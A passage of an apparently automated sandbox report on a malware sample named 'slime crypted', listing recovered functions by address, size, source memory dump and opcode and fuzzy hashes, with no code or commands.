Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83dfb30cc61136cdfbde546e7f0c22f167d8ae5c075a72844c71536017674d5c
Instruction ID: 94951fbca6e60b1ef3b835337496ec036f3e770a2a2be3987cc8b538a33f5647
Opcode Fuzzy Hash: 83dfb30cc61136cdfbde546e7f0c22f167d8ae5c075a72844c71536017674d5c
Instruction Fuzzy Hash: F9E16FB0B146068FDB66EB6CD950A9E77B6EF84740F108529E446DB398EF34EC05CB80

Function 0717C8F8 Relevance: .4, Instructions: 399COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0afbfcc0d841c0b18b68632aa86edcb2532bee0e0b756b52037757045f5ae6b3
Instruction ID: f1204e3ad6efc59aa512a6512fa4bbe3ec0655e282fac6351c3897babe71afe6
Opcode Fuzzy Hash: 0afbfcc0d841c0b18b68632aa86edcb2532bee0e0b756b52037757045f5ae6b3
Instruction Fuzzy Hash: BFF17BB57106018FCB55CF2AC489A6ABBF6FF85710F1984A9E546CB3A1CB34ED00CB90

Function 0717FC48 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffb0ba8c474d233ca0b91ec697d58642590f65a30397be4b644e6aaa9f7fc068
Instruction ID: c64dfb1104caf5b8c550746c5671de23b31bed4c2c6fdf38e9b7c26c270bc7b3
Opcode Fuzzy Hash: ffb0ba8c474d233ca0b91ec697d58642590f65a30397be4b644e6aaa9f7fc068
Instruction Fuzzy Hash: EF617E74B002059FDB159F79D858AAEBBB6FF88310F24842AE906D7394DF359C06CB91

Function 07175508 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4a2eb75e282e6c54f34b83cf6b403e3ad02045784a7efdaeeba9f85f8ac623f
Instruction ID: f2b58a810239c93df49da4a3fe340e990e400438699cc6b928c83cfd1d5590c3
Opcode Fuzzy Hash: d4a2eb75e282e6c54f34b83cf6b403e3ad02045784a7efdaeeba9f85f8ac623f
Instruction Fuzzy Hash: C2B126747006058FCB15DF29C984A6ABBF6FF89700B1584A9E446DB3B5DB30ED05CB60

Function 0717001E Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 013603954f709384902e5724f367a9e1b985fb0c3b86073fdcee956b52ca99ef
Instruction ID: 2bf03cb08585f8a072789b7cfafc170e79605d9b958472e36443712358b724b9
Opcode Fuzzy Hash: 013603954f709384902e5724f367a9e1b985fb0c3b86073fdcee956b52ca99ef
Instruction Fuzzy Hash: 6C8108726012018FC70AEBB4D5548ED3BB5FF85250F458A6AD843AF3AADF34AD08C791

Function 07175D60 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fb256484bef041dbddba430cb0bc93122ebbf6ea31df32a5bd951a7e07dd350
Instruction ID: d039fe3f8d73ed509c6f32c914fbbcc56ebaa13eaf4e9fb2202f8a42d34afa7c
Opcode Fuzzy Hash: 3fb256484bef041dbddba430cb0bc93122ebbf6ea31df32a5bd951a7e07dd350
Instruction Fuzzy Hash: A28161B5B101168FCB05DF68C4849AEBBF6FF49310B15849AE415EB3A1DB30ED11CBA1

Function 07170040 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cfc38893051731f469786e46eed69494bdc360e5b4b1021df65d6f606728baa
Instruction ID: 608dbf4348708de71aeec550737eab49591ca32363a53b7f333ea6e1d89ac2b7
Opcode Fuzzy Hash: 0cfc38893051731f469786e46eed69494bdc360e5b4b1021df65d6f606728baa
Instruction Fuzzy Hash: 407118716012018FD70AEBA4D5508ED3BB6FF85250F458A6AD843AF3AADF30AD08C791

Function 0716F962 Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050130587.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7160000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6575d34dec022a1179535ae875d054ac12fa080ecef290189b3d00a5943f5518
Instruction ID: 4ea30279fba1c1c5b07f7471cde1eb132a23b7d811d2f0c5463c20276f62be5a
Opcode Fuzzy Hash: 6575d34dec022a1179535ae875d054ac12fa080ecef290189b3d00a5943f5518
Instruction Fuzzy Hash: 93617079A00305AFDB15DF64D844AEEBBB6FF89310F14842AE405A73A5DB34D946CB90

Function 07174BA8 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa1a6754457d987db9f9a72ab1a22ca5f9cde7c06279cb84f57d340570b7a763
Instruction ID: 1d7e831e0d3bd43e91c668afec368c8238da66dbb23a3756abdc798ae0b7e39e
Opcode Fuzzy Hash: aa1a6754457d987db9f9a72ab1a22ca5f9cde7c06279cb84f57d340570b7a763
Instruction Fuzzy Hash: 14614FB0B106168FCB15DF69C994AAEBBF6AF88710F158169D905EB3A4DB34DC01CB90

Function 0717FC38 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8052ea51c5fcb6cf153ef84e9a64c6d5e31524bb48e3ce970320b046b0efd793
Instruction ID: 14344e3e9e071976ab94bf570b0d6f35b9195f417cd84a8fc38d858d187b5b0e
Opcode Fuzzy Hash: 8052ea51c5fcb6cf153ef84e9a64c6d5e31524bb48e3ce970320b046b0efd793
Instruction Fuzzy Hash: 34518D74B002059FDB159F64D858ABEBBB6FF88301F248029E906D7398DF399C06CB91

Function 0716F9A8 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050130587.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7160000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbb4148ccbbe0937529cf10c0b67dbb2840b1d34ce85d858d9a06a61ae3d4882
Instruction ID: b07ded7e6cf300acad8a65fda7259adc314ae52880f9a88a7fc29bc07b25de95
Opcode Fuzzy Hash: cbb4148ccbbe0937529cf10c0b67dbb2840b1d34ce85d858d9a06a61ae3d4882
Instruction Fuzzy Hash: 03613B74A01205EFDB15DFA8D844AAEBBF6FF89310F248429E40697395DB349D52CB50

Function 0717F380 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c91750085d34e319142c2e9e3b4893c02886884164a261456dd6b337ff8c817e
Instruction ID: 327dc43a8197003d45318c26bbfcb15cd57b45c57db96c543c55cbd5a2022424
Opcode Fuzzy Hash: c91750085d34e319142c2e9e3b4893c02886884164a261456dd6b337ff8c817e
Instruction Fuzzy Hash: DB517F75B042059FDB15DBA8D984AAFFBBAFF88310F548466E5159B281C730EC42CBA1

Function 07176C60 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 842143f5a18fc4489f107b36b6a277c928d0b8bb8530d01311a3b0770a28042d
Instruction ID: 764199ced4bbab0b50acef8dc54aad2b83512d85084385858caa25df2abd859e
Opcode Fuzzy Hash: 842143f5a18fc4489f107b36b6a277c928d0b8bb8530d01311a3b0770a28042d
Instruction Fuzzy Hash: 54516F71B106058FCB14DF69D88499EBBFAFF88310B1585AAE519DB361DB30EC45CBA0

Function 0717C2D8 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d37dae1a972d6b8ff4ed1e951f352c31c3a2e720d610f9efd8c7108669259fed
Instruction ID: 8f61010df6c63b602571129ce1c57e365413cd20ee10e6b04692d46ca0d5c99a
Opcode Fuzzy Hash: d37dae1a972d6b8ff4ed1e951f352c31c3a2e720d610f9efd8c7108669259fed
Instruction Fuzzy Hash: 03418DB17002058FCB15EF3AC89096EB7FAFF8961071985A9E506DB3A5DB30DC02C7A0

Function 0717AEB0 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b57cc3e1801e1ab341acced2e4f2d67c3d739752c505026d6d6f4f2f65f60eeb
Instruction ID: ced55d71107af793935c4974eb0a2be989a972fdf48b95beb1e0a4ec0ef2e4a4
Opcode Fuzzy Hash: b57cc3e1801e1ab341acced2e4f2d67c3d739752c505026d6d6f4f2f65f60eeb
Instruction Fuzzy Hash: EE416FB0A102059FDB25EFA9D59099EBBB6FF84310F108429E4469B394DF75EC05CB80

Function 0717D720 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24e7228302f0b149c0f160ad8682a230f38ba8e0a47e13f1f13ae6c9320eca65
Instruction ID: 52c57e25e021c8840f317ea26dc0c54c64e6ca531a3fc23d973e16837bfb79e4
Opcode Fuzzy Hash: 24e7228302f0b149c0f160ad8682a230f38ba8e0a47e13f1f13ae6c9320eca65
Instruction Fuzzy Hash: 0A4125B570020A8FCB12DB69E98096EB7B6FFC4314B158466D589CF391DB30EC02C761

Function 071B0002 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050191643.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71b0000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fbac5ed1069c36d2d110f598f26c717e4568d5baa6d301ea9ff00b1a35308af
Instruction ID: 5706bcd8dc66d5fa3e6f24f29123f1cdcfe95fa56aba703288741d2af2f53fbe
Opcode Fuzzy Hash: 9fbac5ed1069c36d2d110f598f26c717e4568d5baa6d301ea9ff00b1a35308af
Instruction Fuzzy Hash: 613191B114D3818FD7278B398850AE77FB5AF4B254F1941DBD490CB1E3E3259848C721

Function 0717D950 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82a4a9497b108678d09d5824c37e8444dfb02a36b0f990fbf6e7eb658f908777
Instruction ID: 2035405175adf61fabb14284641fe4de4290a07d85eaf4d4fa70f8ea724b7d05
Opcode Fuzzy Hash: 82a4a9497b108678d09d5824c37e8444dfb02a36b0f990fbf6e7eb658f908777
Instruction Fuzzy Hash: 664191B17053059FC715DF68D8809AABBF6FF88310B208969E499CB341DB32EC41CB90

Function 07175E20 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91865159b1b15b3c9c71ec5f86628cfbaa5e9dffe7f3579f6299331cb92eef9a
Instruction ID: 8da5a39aac5f7add93bac917dab44f50d61ab827986204e393187c41687163d3
Opcode Fuzzy Hash: 91865159b1b15b3c9c71ec5f86628cfbaa5e9dffe7f3579f6299331cb92eef9a
Instruction Fuzzy Hash: 99414CB5710105CFDB05DF68C58896EBBF6FF89210B1584AAE805DB3A1DB30EC51CBA1

Function 071794D2 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b5c5f51f80aeae0da6a03295e4499843a675a42206f6f23eeda46e2137e521f
Instruction ID: 8f5a7b0a41ee2db8423e3416ba076e10c3c8137471b644076c0c9048fc083e76
Opcode Fuzzy Hash: 0b5c5f51f80aeae0da6a03295e4499843a675a42206f6f23eeda46e2137e521f
Instruction Fuzzy Hash: 1D410E75B002188FDB15EBA4D594AAEB7F7BFC8250F258029E816A7394DF31AD06CB41

Function 0717EF80 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dfa370e3f3d27d141c08917e2eeb5d30b6bb31be07dffc6c948fbff5ad4c833
Instruction ID: 505c09e10018806f05c9ada4c2f2c6d1a98dc33593148d16ebb6bded56964de3
Opcode Fuzzy Hash: 6dfa370e3f3d27d141c08917e2eeb5d30b6bb31be07dffc6c948fbff5ad4c833
Instruction Fuzzy Hash: 6F318171B006079FCB15DB69D880AAFB7FAEF84310F108529D5199B395EB31E902CB90

Function 071761D8 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 134d029f7813b5b3d8f57f24746511625d3fe0a94ad9cd443d92be467a15734c
Instruction ID: 57efacc1f192735a023bdbde5d5e64507e1ba9af00f20fd22b804a46fea9176b
Opcode Fuzzy Hash: 134d029f7813b5b3d8f57f24746511625d3fe0a94ad9cd443d92be467a15734c
Instruction Fuzzy Hash: F1314875B002119FCB55DF78D888A6ABBB6FF89300B148069E906CB395DF35ED05CB91

Function 07179C20 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11efbec6b4832258239bdb25064b8b0864dcd8b088b0948592f5623f56be4277
Instruction ID: 5e2ddc2ffd185441487c33fb81e88ca7e0278b420127d574408195804addaa8e
Opcode Fuzzy Hash: 11efbec6b4832258239bdb25064b8b0864dcd8b088b0948592f5623f56be4277
Instruction Fuzzy Hash: B9315C71B002059FDB05DFA8C985ABEBBB7EF88210F148019E515DB2A5CB30DD06DB90

Function 071761E8 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a4265a0cc3ba8fd60e9aee45aa3374c214ba58c38349277491ac55a40e278c8
Instruction ID: b5b5b3956a2645c0b473d37070d844d05a19e4122deee7e9270eff9860072f3e
Opcode Fuzzy Hash: 6a4265a0cc3ba8fd60e9aee45aa3374c214ba58c38349277491ac55a40e278c8
Instruction Fuzzy Hash: 67315775B002119FCB55DF78D888A6ABBB6FF89300B108069E906CB3A5DF35ED01CB91

Function 0717BC00 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daaaee812edc0a71b143e49fa784c07a58a04450ee8f6fda157e0c03087ada67
Instruction ID: 6eca2d1f7e5fe07ece0bb5ca38850a3696419a4b810ab7499166f4eac771a6f5
Opcode Fuzzy Hash: daaaee812edc0a71b143e49fa784c07a58a04450ee8f6fda157e0c03087ada67
Instruction Fuzzy Hash: AE3181B0704312DFDB259F74989862EB7BAEF88710B244579E90697389DF36DC05CB90

Function 0717C2C8 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fa6c52b9b7e77bb64d46eb29f41ba8ca548142372fdc3aa41f37c14aa9ff204
Instruction ID: 36348cca05457dd36905f66d947cb27e3a8d9bc02e6ffa31f23cca5f687eafae
Opcode Fuzzy Hash: 5fa6c52b9b7e77bb64d46eb29f41ba8ca548142372fdc3aa41f37c14aa9ff204
Instruction Fuzzy Hash: A9217CB5B001118FCB14DF39C98496EB7F6BF8861571585B9D809DB3A4DB31DC02CB90

Function 0717D868 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 537e2431f366e1bfcd1356a608c79c9e3ba0ded424e41d811f7f8dd8c73fb19a
Instruction ID: 2314fb91eced6d86f4805fe23f6a5c87e5f7f8fd2b2d526010f612c5737781e1
Opcode Fuzzy Hash: 537e2431f366e1bfcd1356a608c79c9e3ba0ded424e41d811f7f8dd8c73fb19a
Instruction Fuzzy Hash: 9B2136B13101149FC718DB2DD989A2A7BFAAF88A5075940A9E946CB3B1DF21DC41CBA0

Function 0717EF70 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9c42998d99ef009b0229ae970b0ae6ddc355274d15b6ec92d78c710fa0c9822
Instruction ID: b58e521a385ab9d95900922c679a2a30d48abf53d94e007876305f9e46daa584
Opcode Fuzzy Hash: c9c42998d99ef009b0229ae970b0ae6ddc355274d15b6ec92d78c710fa0c9822
Instruction Fuzzy Hash: 66217FB1A006079FCB15DFB9C840AAFB7FAEF88210F048529D51997794EB30E906CB90

Function 0717DCB8 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2f0e4c7d4a31d4eff994c60b1738ea14031cb5c2bcde6ab67925a2a194f163f
Instruction ID: 7a7cc7117e71d654402c5360f7418051259712e5f97d720cd0f54a79608abe54
Opcode Fuzzy Hash: d2f0e4c7d4a31d4eff994c60b1738ea14031cb5c2bcde6ab67925a2a194f163f
Instruction Fuzzy Hash: 5B21BDB0B0060ACFCB25CF28D9C4A6ABBB5FF48311F1580A8E8459B3E5C730E841CB61

Function 0101D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047264984.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_101d000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68d5ca88e6f38e6ee4bb33548faf53b1f0feb505a6e797e4011d6a01ac7f7e74
Instruction ID: d2178069c1b021bfb609982189d0dc85de1f062d925b61652e30cc5c30eb2621
Opcode Fuzzy Hash: 68d5ca88e6f38e6ee4bb33548faf53b1f0feb505a6e797e4011d6a01ac7f7e74
Instruction Fuzzy Hash: 34212575504200DFCB16DFA8D988B16BFA5FB84314F20C5ADE9890B25AC33ED407CB61

Function 07176F78 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87bf7503510db729367c1829697b59f8c2236ea69f6cb5c97cc829d2ff2f4295
Instruction ID: b48f8eb1677194b45772dc76527625565c92042f6025ddec8908edcb8ad8cd6b
Opcode Fuzzy Hash: 87bf7503510db729367c1829697b59f8c2236ea69f6cb5c97cc829d2ff2f4295
Instruction Fuzzy Hash: CA217C71B00119CFCB15EF78D9948AEB7F6EF896117118069E909DB391DB31EC02CBA2

Function 0717D940 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de8ba100cc653f1a11509ec45374f5c6a1008bd442f27a66ac9f58a9fec6c023
Instruction ID: fb9e0dadaad21e8da0d4e5b58d0aec1492698ad5567568eff348ac0c1652f5ee
Opcode Fuzzy Hash: de8ba100cc653f1a11509ec45374f5c6a1008bd442f27a66ac9f58a9fec6c023
Instruction Fuzzy Hash: 3E11A9B5300204AFC7109F68D88096ABBB6FF89304B148869F846CB381C732E845CB90

Function 07178B19 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bd669dfae97d2f826853e7a76999f91321f53b2d9051ac30430a755c58e499b
Instruction ID: 4d686a1a78b4ff5ae2dacb34b253a7be6dbceedebc173e591cab812269c53a68
Opcode Fuzzy Hash: 2bd669dfae97d2f826853e7a76999f91321f53b2d9051ac30430a755c58e499b
Instruction Fuzzy Hash: C811D2727041168FCB04EB69D8586AEB7B6EFC4320F14C129E805C7394DB319905CBA2

Function 07176F68 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 849647b5e8a5269f94407a67b67ec3f5c08d7b17f747406de3773b8cf0cde995
Instruction ID: d177838879de61774c5367180b0b7a0ef3ee0ec895a37cef808a3c869daddf11
Opcode Fuzzy Hash: 849647b5e8a5269f94407a67b67ec3f5c08d7b17f747406de3773b8cf0cde995
Instruction Fuzzy Hash: B911B271B001168FCB15DF78C58496EB7F6EF89600B118069E405EB390DB31DC02CBE1

Function 0717CDC8 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bcd5d42800e14bb5000882fcac5043931e0b25ca0013c14a2af4b8cc5a276ac
Instruction ID: 68e9c03a6c600310dcf4932222645b9d39ad2a31dba4e08a215f6bd09f99f95f
Opcode Fuzzy Hash: 8bcd5d42800e14bb5000882fcac5043931e0b25ca0013c14a2af4b8cc5a276ac
Instruction Fuzzy Hash: 0611A576B006215FD325DA689C40B2BB7EADBC8760F10413AEA05DB390DE70DC01C7E4

Function 07176E08 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55c5848c63ba9b12845f69e6653f42a8e40c05d733dba0bc33a3f5b44f9fd3d4
Instruction ID: 35ef700b5f7c8d48c3544c12fd77efd11f7e8861a4d2a089525fe390f8edb855
Opcode Fuzzy Hash: 55c5848c63ba9b12845f69e6653f42a8e40c05d733dba0bc33a3f5b44f9fd3d4
Instruction Fuzzy Hash: FB113071B002198BCB35DF65D858AEEBBF5AF8C220F244029E946F3284DF765C45CBA0

Function 07177038 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ad5a7802c2343f008694be6023fb0d811153ece8c6ec0a831fc80ec5513faf9
Instruction ID: 9b3803850d89cb774354c8e8e026406255b40eae3b2f6e105d425a41c334bfa2
Opcode Fuzzy Hash: 5ad5a7802c2343f008694be6023fb0d811153ece8c6ec0a831fc80ec5513faf9
Instruction Fuzzy Hash: 3D11C1716443418FD712CB6CE844F927BE4EF86321F0585AAE255CF6E2D7A1E845C740

Function 0716FBD0 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050130587.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7160000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 532c854ccea8c890480f549d0f5016654036032d46f9c794bf67950ec4c9c0f9
Instruction ID: 342a62875d1d62e1b5126c36ad5cc9563c7432b2ed2542ae2576bba665c0fd88
